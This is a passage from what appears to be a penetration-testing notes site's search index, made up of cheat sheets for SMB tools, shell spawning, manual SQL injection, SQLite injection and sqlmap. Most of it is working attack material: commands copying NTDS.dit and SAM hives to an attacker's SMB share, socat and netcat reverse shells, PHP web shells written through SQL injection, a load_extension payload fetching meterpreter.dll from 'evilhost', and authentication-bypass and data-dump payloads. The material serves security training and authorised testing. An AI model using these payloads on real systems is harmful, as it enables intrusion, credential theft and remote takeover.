    ","tags":["smb","port 445","port 137","port 138","port 139","samba","tools"]},{"location":"smbclient/#quick-cheat-sheet","title":"Quick cheat sheet","text":"
    # List shares on a machine using NULL Session\nsmbclient -L <target-IP>\n\n# List shares on a machine using a valid username + password\nsmbclient -L \\<target-IP\\> -U username%password\n\n# Connect to a valid share with username + password\nsmbclient //\\<target\\>/\\<share$\\> -U username%password\n\n# List files on a specific share\nsmbclient //\\<target\\>/\\<share$\\> -c 'ls' password -U username\n\n# List files on a specific share folder inside the share\nsmbclient //\\<target\\>/\\<share$\\> -c 'cd folder; ls' password -U username\n\n# Download a file from a specific share folder\nsmbclient //\\<target\\>/\\<share$\\> -c 'cd folder;get desired_file_name' password -U username\n\n# Copy a file to a specific share folder\nsmbclient //\\<target\\>/\\<share$\\> -c 'put /var/www/my_local_file.txt .\\target_folder\\target_file.txt' password -U username\n\n# Create a folder in a specific share folder\nsmbclient //\\<target\\>/\\<share$\\> -c 'mkdir .\\target_folder\\new_folder' password -U username\n\n# Rename a file in a specific share folder\nsmbclient //\\<target\\>/\\<share$\\> -c 'rename current_file.txt new_file.txt' password -U username\n
    ","tags":["smb","port 445","port 137","port 138","port 139","samba","tools"]},{"location":"smbmap/","title":"SMBMap","text":"

    SMBMap allows users to enumerate samba share drives across an entire domain. List share drives, drive permissions, share contents, upload/download functionality, file name auto-download pattern matching, and even execute remote commands.

    ","tags":["smb","pass-the-hash","file upload","rce","tools"]},{"location":"smbmap/#installation","title":"Installation","text":"

    Installation from https://github.com/ShawnDEvans/smbmap

    sudo pip3 install smbmap\nsmbmap\n
    ","tags":["smb","pass-the-hash","file upload","rce","tools"]},{"location":"smbmap/#basic-usage","title":"Basic usage","text":"
# Enumerate network shares and access associated permissions\nsmbmap -H $ip\n\n# Enumerate network shares and access associated permissions, recursively\nsmbmap -H $ip -r\n\n# Download a file from a specific share folder\nsmbmap -H $ip --download "folder\file.txt"\n\n# Upload a file to a specific share folder\nsmbmap -H $ip --upload originfile.txt "targetfolder\file.txt"\n
    ","tags":["smb","pass-the-hash","file upload","rce","tools"]},{"location":"smbserver/","title":"smbserver - from impacket","text":"

    Simple SMB Server example. See impacket.

    ","tags":["pentesting windows","server","impacket"]},{"location":"smbserver/#installation","title":"Installation","text":"

    Download from: https://github.com/fortra/impacket/blob/master/examples/smbserver.py

    ","tags":["pentesting windows","server","impacket"]},{"location":"smbserver/#basic-usage","title":"Basic usage","text":"","tags":["pentesting windows","server","impacket"]},{"location":"smbserver/#create-a-share-server-in-attacker-machine-and-connect-from-victims","title":"Create a share server in attacker machine and connect from victim's","text":"

    Launch smbserver in our attacker machine:

    sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py -smb2support CompData /home/username/Documents/\n

    Also you can launch it with username and password:

    sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py -smb2support CompData /home/username/Documents/ -username \"username\" -password \"agreatpassword\"\n

Now, from PowerShell on the victim's Windows machine, we can move a file to the shared folder on the attacker machine just by running:

    cmd.exe /c move C:\\NTDS\\NTDS.dit \\\\$ip\\CompData\n

    Sidenote: see the HackTheBox machine Omni, which uses SirepRAT to upload files to the share. A taste of it:

# First create the share. After that, establish the connection:\npython ~/tools/SirepRAT/SirepRAT.py $ip LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args ' /c net use \\\\10.10.14.2\\CompData /u:username agreatpassword'\n\n# Now copy files to the share. In this case we are dumping hives\npython ~/tools/SirepRAT/SirepRAT.py $ip LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args ' /c reg save HKLM\sam \\\\10.10.14.2\\CompData\\sam'\n
    ","tags":["pentesting windows","server","impacket"]},{"location":"snmpwalk/","title":"snmpwalk - SNMP scanner","text":"

    See SNMP for details about the protocol.

    Snmpwalk is used to query the OIDs with their information. It retrieves a subtree of management values using SNMP GETNEXT requests.

    ","tags":["enumeration","snmp","port 161","tools"]},{"location":"snmpwalk/#installation","title":"Installation","text":"
    sudo apt-get install snmp\n
    ","tags":["enumeration","snmp","port 161","tools"]},{"location":"snmpwalk/#basic-usage","title":"Basic usage","text":"
    snmpwalk -v2c -c public $ip\n
    snmpwalk -v 2c -c public $ip 1.3.6.1.2.1.1.5.0\n
    snmpwalk -v 2c -c private $ip\n

    If we do not know the community string, we can use onesixtyone and SecLists wordlists to identify these community strings.
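A sketch of brute-forcing community strings with onesixtyone and a SecLists wordlist (the wordlist path may differ on your system):

onesixtyone -c /usr/share/seclists/Discovery/SNMP/snmp.txt $ip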

    ","tags":["enumeration","snmp","port 161","tools"]},{"location":"spawn-a-shell/","title":"Spawn a shell","text":"All about shells Shell Type Description Reverse shell Initiates a connection back to a \"listener\" on our attack box. Bind shell \"Binds\" to a specific port on the target host and waits for a connection from our attack box. Web shell Runs operating system commands via the web browser, typically not interactive or semi-interactive. It can also be used to run single commands (i.e., leveraging a file upload vulnerability and uploading a\u00a0PHP\u00a0script to run a single command.

A web shell is a script written in a language that is executed by a web server. Web shells are not fully interactive.
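A minimal PHP web shell for illustration; the filename, upload path, and parameter name are arbitrary:

# Create the web shell
echo '<?php system($_REQUEST["cmd"]); ?>' > shell.php

# After uploading it to the target's web root, run single commands through it
curl "http://target/uploads/shell.php?cmd=id"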

    Resources for upgrading simple shells
    • https://sushant747.gitbooks.io/total-oscp-guide/content/spawning_shells.html.
    • Cheat sheet.
    • Shell creation.
    • About webshells.

Sidenote: you can also generate a webshell using msfvenom

    ","tags":["pentesting","terminal","shells"]},{"location":"spawn-a-shell/#clasification-of-shells","title":"Clasification of shells","text":"

    On a Linux system, the shell is a program that takes input from the user via the keyboard and passes these commands to the operating system to perform a specific function.

    There are three main types of shell connections:

• Reverse shell: Initiates a connection back to a "listener" on our attack box.
• Bind shell: "Binds" to a specific port on the target host and waits for a connection from our attack box.
• Web shell: Runs operating system commands via the web browser; typically not interactive or semi-interactive. It can also be used to run single commands (i.e., leveraging a file upload vulnerability and uploading a PHP script to run a single command).
","tags":["pentesting","terminal","shells"]},{"location":"spawn-a-shell/#spawn-a-shell_1","title":"Spawn a shell","text":"","tags":["pentesting","terminal","shells"]},{"location":"spawn-a-shell/#bash","title":"bash","text":"
# Upgrade shell by running these commands in sequence:\n\nSHELL=/bin/bash script -q /dev/null\nCtrl-Z\nstty raw -echo\nfg\nreset\nxterm\n
bash -i\n\n# Using echo (when input is fed to a Python interpreter)\necho os.system('/bin/bash')\n
    ","tags":["pentesting","terminal","shells"]},{"location":"spawn-a-shell/#python","title":"python","text":"
     # using python for a pseudo terminal\npython -c 'import os; os.system(\"/bin/sh\")'\n
     # using python for a pseudo terminal\npython -c 'import pty; pty.spawn(\"/bin/bash\")'\n\npython3 -c \"import pty;pty.spawn('/bin/bash')\"\n
    ","tags":["pentesting","terminal","shells"]},{"location":"spawn-a-shell/#ssh","title":"ssh","text":"
    /bin/sh -i\n
    ","tags":["pentesting","terminal","shells"]},{"location":"spawn-a-shell/#perl","title":"perl","text":"
    perl -e 'exec \"/bin/sh\";'\n\nperl:\u00a0 exec \"/bin/sh\";\n
    ","tags":["pentesting","terminal","shells"]},{"location":"spawn-a-shell/#ruby","title":"ruby","text":"
    ruby:\u00a0 exec \"/bin/sh\";\n
    ","tags":["pentesting","terminal","shells"]},{"location":"spawn-a-shell/#lua","title":"lua","text":"
lua: os.execute('/bin/sh')\n
    ","tags":["pentesting","terminal","shells"]},{"location":"spawn-a-shell/#socat","title":"socat","text":"
    # Listener:\nsocat file:`tty`,raw,echo=0 tcp-listen:4444\n\n#Victim:\nsocat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444\n

If socat isn't installed, there are other options: standalone binaries can be downloaded from this Github repo: https://github.com/andrew-d/static-binaries

With a command injection vuln, it's possible to download the correct-architecture socat binary to a writable directory, chmod it, then execute a reverse shell in one line:

    wget -q https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O /tmp/socat; chmod +x /tmp/socat; /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444\n

    On Kali, run:

    socat file:`tty`,raw,echo=0 tcp-listen:4444\n

    and you\u2019ll catch a fully interactive TTY session. It supports tab-completion, SIGINT/SIGSTP support, vim, up arrow history, etc. It\u2019s a full terminal.

    ","tags":["pentesting","terminal","shells"]},{"location":"spawn-a-shell/#stty-options","title":"stty options","text":"
    # In reverse shell\n$ python -c 'import pty; pty.spawn(\"/bin/bash\")'\n\n# Ctrl-Z\n\n\n# In Kali\n$ stty raw -echo\n$ fg\n
    # In reverse shell\nreset\nexport SHELL=bash\nexport TERM=xterm-256color\nstty size\nstty rows <num> columns <cols>\n\n# In one line:\nreset; export SHELL=bash; export TERM=xterm-256color; stty rows <num> columns <cols>\n
    ","tags":["pentesting","terminal","shells"]},{"location":"spawn-a-shell/#msfvenom","title":"msfvenom","text":"

    You can generate a webshell by using\u00a0 msfvenom

    # List payloads\nmsfvenom --list payloads | grep x64 | grep linux | grep reverse\n

    msfvenom can also use Metasploit payloads under \"cmd/unix\" to generate one-liner bind or reverse shells. List the options with:

    msfvenom -l payloads | grep \"cmd/unix\" | awk '{print $1}'\n
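    For example (a sketch; the LHOST/LPORT values are placeholders for our attack box), a reverse-shell one-liner can be generated with one of those payloads:

    msfvenom -p cmd/unix/reverse_netcat LHOST=10.10.14.2 LPORT=4444 -f raw\n# Prints a shell one-liner to stdout; running it on the target connects back to LHOST:LPORT\n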
    ","tags":["pentesting","terminal","shells"]},{"location":"spawn-a-shell/#awk","title":"awk","text":"
    awk 'BEGIN {system(\"/bin/sh\")}'\n
    ","tags":["pentesting","terminal","shells"]},{"location":"spawn-a-shell/#find","title":"find","text":"
    find / -name nameoffile -exec /bin/awk 'BEGIN {system(\"/bin/sh\")}' \\;\n# This use of the find command is searching for any file listed after the -name option, then it executes awk (/bin/awk) and runs the same script we discussed in the awk section to execute a shell interpreter.\n\nfind . -exec /bin/sh \\; -quit\n# This use of the find command uses the execute option (-exec) to initiate the shell interpreter directly. If find can't find the specified file, then no shell will be attained.\n
    ","tags":["pentesting","terminal","shells"]},{"location":"spawn-a-shell/#vim","title":"VIM","text":"
    vim -c ':!/bin/sh'\n

    VIM escape:

    vim\n:set shell=/bin/sh\n:shell\n
    ","tags":["pentesting","terminal","shells"]},{"location":"sqli-manual-attack/","title":"SQLi Cheat sheet for manual injection","text":"

    Resources

    • See a more detailed explanation about SQL injection.
    • PayloadsAllTheThings Original payloads for different SQL databases.
    OWASP

    OWASP Web Security Testing Guide 4.2 > 7. Data Validation Testing > 7.5. Testing for SQL Injection

    ID 7.5 / WSTG-INPV-05: Testing for SQL Injection. Identify SQL injection points; assess the severity of the injection and the level of access that can be achieved through it.

    Languages and dictionaries:

    • MySQL payloads.
    • MSSQL payloads.
    • PostgreSQL payloads.
    • Oracle SQL payloads.
    • SQLite payloads.
    • Cassandra payloads.

    Attack-based dictionaries:
    • Generic SQL Injection Payloads
    • Generic Error Based Payloads.
    • Generic Union Select Payloads.
    • SQL time based payloads .
    • SQL Injection Auth Bypass Payloads
    ","tags":["pentesting"]},{"location":"sqli-manual-attack/#comment-injection","title":"Comment injection","text":"

    Put a line comment at the end to comment out the rest of the query.

    Valid for MySQL, SQL Server, PostgreSQL, Oracle, SQLite:

    -- comment      // MySQL [Note the space after the double dash]\n--comment       // MSSQL\n--comment       // PostgreSQL\n--comment       // Oracle\n\n\n/*comment*/     // MySQL\n/*comment*/     // MSSQL\n/*comment*/     // PostgreSQL\n\n#comment        // MySQL\n
    ","tags":["pentesting"]},{"location":"sqli-manual-attack/#boolean-based-testing","title":"Boolean-based testing","text":"","tags":["pentesting"]},{"location":"sqli-manual-attack/#integer-based-parameter-injection","title":"Integer based parameter injection","text":"

    Common in Integer based parameter injection such as:

    URL: https://site.com/user.php?id=1\nSQL query: SELECT * FROM users WHERE id= FUZZ;\n

    Typical payloads for that query:

    # Returns true\nAND 1\nAND true\n\n# Returns false\nAND 0\nAND false\n\n# Arithmetic test: if vulnerable, id=1*56 behaves like id=56;\n# if not vulnerable, it behaves like id=1 or triggers an error\n1*56\n
    ","tags":["pentesting"]},{"location":"sqli-manual-attack/#string-based-parameter-injection","title":"String based parameter injection","text":"
    URL: https://site.com/user.php?id=alexis\nSQL query: SELECT * FROM users WHERE name= 'FUZZ';\n

    Typical payloads for that query:

    # Return true\n''\n\"\"\n\n# Return false\n'\n\"\n

    Exploiting single quote ('): In SQL, the single quote is used to delimit string literals. A way to exploit this is in a Login form:

    # SQL query\nSELECT * FROM users WHERE username = '<username>' AND password = '<password>'\n\n# Payload\n' OR '1'='1'; --\n\n# The injected code ' OR '1'='1'; -- makes the condition '1'='1' evaluate to true, effectively bypassing the authentication mechanism. The modified query becomes:\nSELECT * FROM users WHERE username = '' OR '1'='1'; -- ' AND password = '<password>'\n
    ","tags":["pentesting"]},{"location":"sqli-manual-attack/#error-based-testing","title":"Error-based testing","text":"Dictionaries

    https://github.com/amandaguglieri/dictionaries/blob/main/SQL/error-based

    Firstly, every DBMS/RDBMS responds to incorrect/erroneous SQL queries with different error messages, so an error response can be used to fingerprint the database:

    A typical error from MS-SQL will look like this:

    Incorrect syntax near [query snippet]\n

    While a typical MySQL error looks more like this:

    You have an error in your SQL syntax. Check the manual that corresponds\nto your MySQL server version for the right syntax to use near [query\nsnippet]\n
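    A quick way to provoke such an error (an illustrative example; the URL is a placeholder) is to inject a lone single quote into a parameter:

    curl 'https://site.com/user.php?id=1%27'\n# %27 is a url-encoded single quote; a verbose DBMS error in the response fingerprints the backend\n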
    ","tags":["pentesting"]},{"location":"sqli-manual-attack/#union-attack","title":"UNION attack","text":"Dictionaries

    https://github.com/amandaguglieri/dictionaries/blob/main/SQL/union-select

    ","tags":["pentesting"]},{"location":"sqli-manual-attack/#mysql","title":"MYSQL","text":"
    #########\nMYSQL\n#########\n\n# Access (using null characters)\n' OR '1'='1' %00\n' OR '1'='1' %16\n\n\n\n# 1. Bypass a form      \n1' OR '1'='1';#\n' OR '1'='1';#\n1' OR '1'='1';-- - \n' OR '1'='1';-- -  \n\n\n# 2. Number of columns (UNION attack)\n1' OR '1'='1' order by 1;#\n1' OR '1'='1' order by 2;#\n1' OR '1'='1' order by 3;#\n...\n# Do this until you get an error message and then you will know the number of columns\n# Another method to see the number of columns. \n' OR '1'='1' order by 1;-- -   \n\n# 3. Get which column is being displayed. For instance, when we know we have 6 columns:\n1' OR '1'='1' UNION SELECT 1,2,3,4,5,6;# \n\n# 4. Get names of all databases \n1' OR '1'='1' UNION SELECT null,table_schema,null,null,null,null FROM information_schema.tables;#\n# 4. Get names of all databases in SQLite (name and schema of the tables stored in the database).\na' or '1'='1' union select tbl_name,2,3,4,5 from sqlite_master --\n\n\n# 5. Get names of all tables from the selected database\n1' OR '1'='1' UNION SELECT null,table_name,null,null,null,null FROM information_schema.tables;# \n\n\n# 6. Get the name of all columns of a selected table from a selected database\n1' OR '1'='1' UNION SELECT null,column_name,null,null,null,null FROM information_schema.columns WHERE table_name='users';#\n\n\n# 7. Get the value of a selected column (for instance, password)\n1' OR '1'='1' UNION SELECT null,passwords,null,null,null,null FROM users;#\n\n1' OR '1'='1' UNION SELECT null,passwords,null,null,null,null FROM <databaseName.tableName>;#\n
    ","tags":["pentesting"]},{"location":"sqli-manual-attack/#sqlite","title":"SQLite","text":"
    #########\nSQLite\n#########\n\n# Ensure that the targeted parameter is vulnerable\n1' a' or '1'='1' --\n\n# Determine the number of columns of the query\n1' a' or '1'='1' order by 1 -- //returns all results\n1' a' or '1'='1' order by 2 -- //returns all results\n1' a' or '1'='1' order by 3 -- //returns all results\n1' a' or '1'='1' order by 4 -- //returns all results\n1' a' or '1'='1' order by 5 -- //returns all results\n1' a' or '1'='1' order by 6 -- //returns none\n# Therefore the query contains 5 columns.\n\n# Determine which columns are being returned\n1' a' or '1'='1' UNION SELECT 1,2,3,4,5 -- \n# The table in this demo returned values 1,3,4,5. Value 2 was not returned.\n\n# Extract version of sqlite database\n1' a' or '1'='1' UNION SELECT sqlite_version(),NULL,NULL,NULL,NULL -- \n\n# Determine the name and schema of the tables stored in the database.\na' or '1'='1' union select tbl_name,2,3,4,5 from sqlite_master --\n\n# Determine the SQL command used to construct the tables:\na' or '1'='1' union select sql,2,3,4,5 from sqlite_master --\n# In this demo it returned:\n1   CREATE TABLE results (rollno text primary key, email text, name text, marks real, rank integer) 4   5\n1   CREATE TABLE secret_flag (flag text, value text)    4   5\n\n# Retrieve two columns from a table\na' or '1'='1' union select flag,2,value,4,5 from secret_flag --\n

    Also, once we know which column is injectable, there are some SQL functions that can provide us with valuable data:

    database()\nuser()\nversion()\nsqlite_version()\n

    Also, interesting payloads for retrieving concatenated values in a UNION-based attack:

    ## Extract database names, table names and column names\n\n#Database names\n-1' UniOn Select 1,2,gRoUp_cOncaT(0x7c,schema_name,0x7c) fRoM information_schema.schemata\n\n#Tables of a database\n-1' UniOn Select 1,2,3,gRoUp_cOncaT(0x7c,table_name,0x7C) fRoM information_schema.tables wHeRe table_schema=[database]\n\n#Column names\n-1' UniOn Select 1,2,3,gRoUp_cOncaT(0x7c,column_name,0x7C) fRoM information_schema.columns wHeRe table_name=[table name]\n

    And here is an example of how to retrieve them:

    # if injectable columns are number 2, 3 and 4 you can display some info from the system\nunion select 1, database(),user(),version(),5\n\n# Extra bonus\n# You can also load a file from the system with\nunion select 1, load_file('/etc/passwd'),3,4,5\n\n# and you can try to write to a file in the server\nunion select 1,'example example',3,4,5 into outfile '/var/www/path/to/file.txt'\nunion select 1,'example example',3,4,5 into outfile '/tmp/file.txt'\n\n# and we can combine that with a reverse shell like\nunion select 1,'<?passthru(\"nc -e /bin/sh <attacker IP> <attacker port>\") ?>', 3,4,5 into outfile '/tmp/reverse.php'\n
    ","tags":["pentesting"]},{"location":"sqli-manual-attack/#sqli-blind-attack","title":"SQLi Blind attack","text":"

    First, check the application's response to different requests (for instance, with true/false statements). If you can tell true responses from false ones and validate that the application is processing the boolean values, then you can apply this technique. For that purpose, the AND operator is the most useful, as in the sketch below.
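    As a sketch (placeholder URL), two probes whose responses should differ only if the parameter is injectable:

    # Should return the normal page if injectable (true condition)\nhttps://site.com/user.php?id=1 AND 1=1\n\n# Should return a different or empty page if injectable (false condition)\nhttps://site.com/user.php?id=1 AND 1=2\n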

    ","tags":["pentesting"]},{"location":"sqli-manual-attack/#boolean-based","title":"Boolean based","text":"Dictionaries

    https://github.com/amandaguglieri/dictionaries/blob/main/SQL/error-based

    user() returns the name of the user currently using the database. substring() returns a substring of the given argument. It takes three parameters: the input string, the position of the substring and its length.

    Boolean based query:

    ' OR substring(user(), 1, 1) = 'a\n' OR substring(user(), 1, 1) = 'b\n

    More interesting queries:

    # Database version\n1 and substring(version(), 1, 1) = 4--\n\n# Check that second character of the column user_email for user_name admin from table users is greater than the 'c' character  \n1 and substring((SELECT user_email FROM users WHERE user_name = 'admin'),2,1) > 'c'\n
    ","tags":["pentesting"]},{"location":"sqli-manual-attack/#time-based","title":"Time based","text":"Dictionaries

    https://github.com/amandaguglieri/dictionaries/blob/main/SQL/time-based

    Resources

    • OWASP resources

    Vulnerable SQL query:

    SELECT * from users WHERE username = '[username]' AND password = '[password]';\n

    Time base query:

    ' OR SLEEP(5) -- '\n

    Interesting queries:

    1' AND IF(SUBSTRING(user(), 1, 1) = 'r', SLEEP(10), SLEEP(0));#\n

    Examples of available wait/timeout functions include:

    • WAITFOR DELAY '0:0:10' in SQL Server
    • BENCHMARK() and sleep(10) in MySQL
    • pg_sleep(10) in PostgreSQL
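    As a sketch, these functions can be dropped into payloads like the ones above:

    # SQL Server\n'; WAITFOR DELAY '0:0:10'--\n\n# MySQL\n' OR SLEEP(10)-- -\n\n# PostgreSQL\n' AND 1=(SELECT 1 FROM pg_sleep(10))--\n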
    ","tags":["pentesting"]},{"location":"sqli-manual-attack/#extra-bonus-bypassing-quotation-marks","title":"Extra Bonus: Bypassing quotation marks","text":"

    Sometimes quotation marks get filtered out of SQL queries. When querying for a table name, we may be able to avoid quotation marks altogether by supplying the table name directly as a hex literal.
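    For instance (an illustrative payload reusing the 6-column UNION from the MySQL section), the string 'users' can be written as the hex literal 0x7573657273:

    # Equivalent to WHERE table_name='users', but with no quotation marks needed\n1' OR '1'='1' UNION SELECT null,column_name,null,null,null,null FROM information_schema.columns WHERE table_name=0x7573657273;#\n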

    More bypassing tips:

    # Using mingled upper and lowercase\n\n# Using spaces url encoded\n+\n\n# Using comments\n/**/\n/**\n--\n; --\n; /*\n; //\n\n# Example of bypassing webpages that only display one value at a time\n1'+uNioN/**/sEleCt/**/table_name,2+fROm+information_schema.tables+where+table_schema='dvwa'+limit+1,1%23&Submit=Submit#\n
    ","tags":["pentesting"]},{"location":"sqli-manual-attack/#extra-bonus-gaining-a-reverse-shell-from-sql-injection","title":"Extra Bonus: Gaining a reverse shell from SQL injection","text":"

    Take a WordPress installation that uses a MySQL database. If you manage to log in to the MySQL panel (/phpmyadmin) as root, then you can upload a PHP shell to the /wp-content/uploads/ folder.

    Select \"<?php echo shell_exec($_GET['cmd']);?>\" into outfile \"/var/www/https/blogblog/wp-content/uploads/shell.php\";\n
    ","tags":["pentesting"]},{"location":"sqli-manual-attack/#extra-bonus-dual","title":"Extra Bonus: DUAL","text":"

    DUAL is a special one-row, one-column table present by default in all Oracle databases. The owner of DUAL is SYS, but DUAL can be accessed by every user. This is a possible payload for SQLi:

    '+UNION+SELECT+NULL+FROM+dual--\n

    Oracle syntax requires the use of FROM, but some queries don't require any table; for these cases we use DUAL. Also, Oracle does not allow queries that employ information_schema.tables.

    ","tags":["pentesting"]},{"location":"sqlite/","title":"SQLite injections","text":"","tags":["database","relational","database","SQL"]},{"location":"sqlite/#basic-payloads","title":"Basic payloads","text":"
    # Ensure that the targeted parameter is vulnerable\n1' a' or '1'='1' --\n\n# Determine the number of columns of the query\n1' a' or '1'='1' order by 1 -- //returns all results\n1' a' or '1'='1' order by 2 -- //returns all results\n1' a' or '1'='1' order by 3 -- //returns all results\n1' a' or '1'='1' order by 4 -- //returns all results\n1' a' or '1'='1' order by 5 -- //returns all results\n1' a' or '1'='1' order by 6 -- //returns none\n# Therefore the query contains 5 columns.\n\n# Determine which columns are being returned\n1' a' or '1'='1' UNION SELECT 1,2,3,4,5 -- \n# The table in this demo returned values 1,3,4,5. Value 2 was not returned.\n\n# Extract version of sqlite database\n1' a' or '1'='1' UNION SELECT sqlite_version(),NULL,NULL,NULL,NULL -- \n\n# Determine the name and schema of the tables stored in the database.\na' or '1'='1' union select tbl_name,2,3,4,5 from sqlite_master --\n\n# Determine the SQL command used to construct the tables:\na' or '1'='1' union select sql,2,3,4,5 from sqlite_master --\n# In this demo it returned:\n1   CREATE TABLE results (rollno text primary key, email text, name text, marks real, rank integer) 4   5\n1   CREATE TABLE secret_flag (flag text, value text)    4   5\n\n# Retrieve two columns from a table\na' or '1'='1' union select flag,2,value,4,5 from secret_flag --\n

    Source: https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/SQLite%20Injection.md

    # SQLite comments\n--\n/**/\n\n# SQLite version\nselect sqlite_version();\n\n# String based: Extract database structure\nSELECT sql FROM sqlite_schema\n\n# Integer or String based: Extract table name\nSELECT group_concat(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%'\n\n# Integer or String based: Extract column name\nSELECT sql FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name ='table_name'\n\n# For a clean output\nSELECT replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(substr((substr(sql,instr(sql,'(')%2b1)),instr((substr(sql,instr(sql,'(')%2b1)),'')),\"TEXT\",''),\"INTEGER\",''),\"AUTOINCREMENT\",''),\"PRIMARY KEY\",''),\"UNIQUE\",''),\"NUMERIC\",''),\"REAL\",''),\"BLOB\",''),\"NOT NULL\",''),\",\",'~~') FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name NOT LIKE 'sqlite_%' AND name ='table_name'\n\n# Cleaner output\nSELECT GROUP_CONCAT(name) AS column_names FROM pragma_table_info('table_name');\n\n# Boolean: Count number of tables\nand (SELECT count(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%' ) < number_of_table\n\n# Boolean: Enumerating table name\nand (SELECT length(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name not like 'sqlite_%' limit 1 offset 0)=table_name_length_number\n\n# Boolean: Extract info\nand (SELECT hex(substr(tbl_name,1,1)) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%' limit 1 offset 0) > hex('some_char')\n\n# Boolean: Extract info (order by)\nCASE WHEN (SELECT hex(substr(sql,1,1)) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%' limit 1 offset 0) = hex('some_char') THEN <order_element_1> ELSE <order_element_2> END\n\n# Boolean: Error based\nAND CASE WHEN [BOOLEAN_QUERY] THEN 1 ELSE load_extension(1) END\n\n# Time based\nAND [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))\n
    ","tags":["database","relational","database","SQL"]},{"location":"sqlite/#remote-command-execution-using-sqlite-command-attach-database","title":"Remote Command Execution using SQLite command - Attach Database","text":"
    ATTACH DATABASE '/var/www/lol.php' AS lol;\nCREATE TABLE lol.pwn (dataz text);\nINSERT INTO lol.pwn (dataz) VALUES (\"<?php system($_GET['cmd']); ?>\");--\n
    ","tags":["database","relational","database","SQL"]},{"location":"sqlite/#remote-command-execution-using-sqlite-command-load_extension","title":"Remote Command Execution using SQLite command - Load_extension","text":"
    UNION SELECT 1,load_extension('\\\\evilhost\\evilshare\\meterpreter.dll','DllMain');--\n
    ","tags":["database","relational","database","SQL"]},{"location":"sqlite/#references","title":"References","text":"

    • Injecting SQLite database based applications - Manish Kishan Tanwar
    • SQLite Error Based Injection for Enumeration

    ","tags":["database","relational","database","SQL"]},{"location":"sqlmap/","title":"sqlmap - A tool for testing SQL injection","text":"","tags":["pentesting"]},{"location":"sqlmap/#get-parameter","title":"GET parameter","text":"
    sqlmap -u 'http://victim.site/view.php?id=112' -p id --technique=U\n# -p: to indicate an injectable parameter \n# --technique=U: to indicate a UNION-based SQL injection technique (E: error-based)\n# -b: banner of the database\n# --tor: to use a proxy to connect to the target URL\n# -v3: to see the payloads that sqlmap is using\n# --flush-session: to refresh sessions\n# --tamper: default tampers are in /usr/share/sqlmap/tamper\n
    ","tags":["pentesting"]},{"location":"sqlmap/#post-parameter","title":"POST parameter","text":"
    sqlmap -u <URL> --data=<POST string> -p parameter [options]\n
    ","tags":["pentesting"]},{"location":"sqlmap/#using-r-file","title":"Using -r file","text":"

    Capture the request with burpsuite and save it to a file.

    # Get all databases\nsqlmap -r nameoffiletoinject --method POST --data \"parameter=lala\" -p parameter --dbs    \n\n# Get all tables \nsqlmap -r nameoffiletoinject --tables\n\n# Get all columns of a given database dvwa\nsqlmap -r nameoffiletoinject -D dvwa --columns\n\n# Get all tables of a given database, for example dvwa\nsqlmap -r nameoffiletoinject -D dvwa --tables\n\n# Get all columns of a given table in a given database\nsqlmap -r nameoffiletoinject -D dvwa -T users --columns\n\n# Dump users table\nsqlmap -r nameoffiletoinject -D dvwa -T users --dump\n\n# Get columns username and password of table users from database dvwa\nsqlmap -r nameoffiletoinject -D dvwa -T users -C username,password --dump\n\n# Automatically attempt to upload a web shell using the vulnerable parameter and execute it\nsqlmap -r nameoffiletoinject -p vuln-param --os-shell \n\n# Alternatively use the --os-pwn option to gain a shell using meterpreter or vnc \nsqlmap -r nameoffiletoinject -p vuln-param --os-pwn \n
    ","tags":["pentesting"]},{"location":"sqlmap/#using-url","title":"Using URL","text":"

    You can also provide the url with --url or -u

    sqlmap --url 'http://victim.site' --dbs --batch\nsqlmap --url 'http://victim.site' --users   // gets users\nsqlmap --url 'http://victim.site' --tables  // gets all tables\nsqlmap --url 'http://victim.site' --batch\n\n\n# Check what users we have and which privileges that user has.\nsqlmap -u $IP/path.php --forms --cookie=\"PHPSESSID=v5098os3cdua2ps0nn4ueuvuq6\" --batch --users\n\n# Dump the password hash for a user (postgres in the example) and exploit that super permission.\nsqlmap -u http://10.129.95.174/dashboard.php --forms --cookie=\"PHPSESSID=e14ch3u8gfbq8u3h97t8bqss9o\" -U postgres --password --batch\n\n# Get a shell \nsqlmap -u http://10.129.95.174/dashboard.php --forms --cookie=\"PHPSESSID=e14ch3u8gfbq8u3h97t8bqss9o\" --batch --os-shell                  \n
    ","tags":["pentesting"]},{"location":"sqlmap/#getting-a-direct-sql-shell","title":"Getting a direct SQL Shell","text":"
    # Get an OS shell\nsqlmap --url 'http://victim.site' --os-shell\n\n# Get a SQL shell\nsqlmap --url 'http://victim.site' --sql-shell\n
    ","tags":["pentesting"]},{"location":"sqlmap/#suffixes-and-preffixes","title":"Suffixes and preffixes","text":"","tags":["pentesting"]},{"location":"sqlmap/#set-a-suffix","title":"Set a suffix","text":"
    sqlmap -u \"http://example.com/?id=1\"  -p id --suffix=\"-- \"\n
    ","tags":["pentesting"]},{"location":"sqlmap/#prefix","title":"Prefix","text":"
    sqlmap -u \"http://example.com/?id=1\"  -p id --prefix=\"') \"\n
    ","tags":["pentesting"]},{"location":"sqlmap/#injections-in-headers-and-other-http-methods","title":"Injections in Headers and other HTTP Methods","text":"
    #Inside cookie\nsqlmap  -u \"http://example.com\" --cookie \"mycookies=*\"\n\n#Inside some header\nsqlmap -u \"http://example.com\" --headers=\"x-forwarded-for:127.0.0.1*\"\nsqlmap -u \"http://example.com\" --headers=\"referer:*\"\n\n#PUT Method\nsqlmap --method=PUT -u \"http://example.com\" --headers=\"referer:*\"\n\n#The injection is located at the '*'\n
